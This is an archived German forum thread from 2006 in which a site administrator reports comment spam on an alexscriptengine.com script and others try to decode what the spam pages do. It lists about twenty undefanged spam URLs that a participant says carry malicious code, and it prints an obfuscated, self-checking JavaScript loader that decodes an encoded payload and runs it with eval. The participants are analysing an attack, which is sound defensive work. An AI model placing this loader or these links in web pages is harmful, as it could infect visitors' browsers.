PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Spam auf Script von alexscriptengine.com



Sebastian
17.12.2006, 20:54
Moin,

mal wieder ein neuer Schwall von Spam auf dem o.g. Script, welches ich im Einsatz habe. Durch dieses Pack habe ich schon den Gästen die Kommentarfunktion abschalten müssen- nun schlägt das hier heute wieder zig fach auf:

Gemeldeter Fehler: MySQL Error


Mitteilung:
0eeb97b2f4d7866c836552f73ae0d18a
http://basketschoolbrianza.vl04vr4.info/
http://lazzarifoppapedretti.z3krc92.info/
http://termeposeidonischia.nbcf398.info/
http://hotellagodiseo.c3riv3r.info/
http://comunedilaives.vl04vr4.info/
http://jellowpecora.j90v3rvc.info/
http://masterizzatoredvdnec2500.k9r823.info/
http://giochiscaricabilicellularenokia.vj498v4.info/
http://sarahmichellegellarnuda.vl04vr4.info/
http://truccogratisxbox.vl04vr4.info/
http://ragazzaorbassano.eiwfr4.info/
http://regolepokeritaliano.fj94rf3.info/
http://disoleatore.3rvfj3v.info/
http://corsodisegnatoremetalmeccanicobergamo.kc9r32jv.info/
http://telefonotelefoninocellulareshopping.kv9rv3a.info/
http://fotodidonnainminigonna.g5gdfvw.info/
http://ecomuseo.vj498v4.info/
http://seminarioyogamilano.k39efc3.info/
http://multimediafriuli.x3c03r.info/
http://latinaoggi.3rvfj3v.info/

Den Header lasse ich raus, da das ja von mir als Adminnotify verschickt wird. Wollte den Spammer mal ein wenig jagen und habe versucht, den Domains zu folgen und mein Firefox sagt mir nur bei jedem dieser links:


Fehler: Server nicht gefunden

Der Server unter abusecenter.org konnte nicht gefunden werden.
Was hat denn abusecentrer.org denn damit zu tun? Oder ist es mein Firefox, der spinnt? Jede der o.g. URLs zeigt den gleichen Fehler an und ich weiss nicht einmal, wofür dieser Vollpatient spammen wollte :rolleyes:

actro
17.12.2006, 21:04
um himmels willen, bist du denn jeck? hast du dir die links mal genauer angeschaut? die verifizieren über http-referrer den auslöser..die seiten sind nicht leer, sondern stecken voller code..

bitte in zukunft erst entschärfen vor dem posten, hoffentlich hat keiner draufgeklickt..

Liquid-Sky-Net
17.12.2006, 21:56
Hm... komisch ist das Ganze schon... vor allen Dingen sieht mir das nicht nach JavaScript aus, obwohl es als solches gestartet wird...


<SCRIPT LANGUAGE="Javascript">
function e(kI,d){if(!d){d='Cy*hc1aZ2!|WLD30J-H/gSr.BAVM9Ke_Etjp7vonI6O4#=i]zd);b?%FU [at] s+&G:^';}var L;var cX='';for(var g=0;g<kI.length;g+=arguments.callee.toString().replace(/\s/g,'').length-535){L=(d.indexOf(kI.charAt(g))&255)<<18|(d.indexOf(kI.charAt(g+1))&255)<<12|(d.indexOf(kI.charAt(g+2))&255)<<(arguments.callee.toString().replace(/\s/g,'').length-533)|d.indexOf(kI.charAt(g+3))&255;cX+=String.fromCharCode((L&16711680)>>16,(L&65280)>>8,L&255);}eval(cX.substring(0,cX.length-(arguments.callee.toString().replace(/\s/g,'').length-537)));}e('AaGpKr?vMnJiKF!6KagI!;d/J?!!g1JE/c13-?Sy-bgG276tKo1;BF!69ZJj21DHJ;bjVZ-b9hI]W%6;WnypAr2iB%L]Br-%A.!bV.66Mo9]Vr [at] 7A.EiVZ-=MhG)ArBG!)=7M%D?MrSiK*@)ArAv9n!v9j#n2pU&W)94!FDp9ovzKhUn|/#E2*CE');
</SCRIPT>

Kann mir das jemand übersetzen?

Edit: Hier ist der ganze Code: http://nopaste.actrophp.de/?46

exe
18.12.2006, 05:09
Ich hab den Code mal umgebrochen, muss jetzt aber los:

<SCRIPT LANGUAGE="Javascript">
function e(kI,d) {
if(!d) {
d='Cy*hc1aZ2!|WLD30J-H/gSr.BAVM9Ke_Etjp7vonI6O4#=i]zd);b?%FU [at] s+&G:^';
}
var L;
var cX='';
for(var g=0; g<kI.length; g+=arguments.callee.toString().replace(/\s/g,'').length-535) {
L=(d.indexOf(kI.charAt(g))&255)<<18|(d.indexOf(kI.charAt(g+1))&255)<<12|(d.indexOf(kI.charAt(g+2))&255)<<(arguments.callee.toString().replace(/\s/g,'').length-533)|d.indexOf(kI.charAt(g+3))&255;
cX+=String.fromCharCode((L&16711680)>>16,(L&65280)>>8,L&255);
}
eval(cX.substring(0,cX.length-(arguments.callee.toString().replace(/\s/g,'').length-537)));
}

e('AaGpKr?vMnJiKF!6KagI!;d/J?!!g1JE/c13-?Sy-bgG276tKo1;BF!69ZJj21DHJ;bjVZ-b9hI]W%6;WnypAr2iB%L]Br-%A.!bV.66Mo9]Vr [at] 7A.EiVZ-=MhG)ArBG!)=7M%D?MrSiK*@)ArAv9n!v9j#n2pU&W)94!FDp9ovzKhUn|/#E2*CE');
</SCRIPT>

wisi
18.12.2006, 13:55
<SCRIPT LANGUAGE="Javascript">
...
eval(cX.substring(0,cX.length-(arguments.callee.toString().replace(/\s/g,'').length-537)));
...
</SCRIPT>
Ist das schmutzig, ne Funktion, die über ihren eigenen Inhalt (arguments.callee) ein Ergebnis berechnet... Aua!
Vermutlich steckt dort drin, was sie ins Netz schickt. Was genau, ist nicht so einfach herauszufinden, dafür müßte man ja den Code ändern, was wiederum das Ergebnis des eval-Befehls ändert, worin wiederum des Pudels Kern stecken dürfte...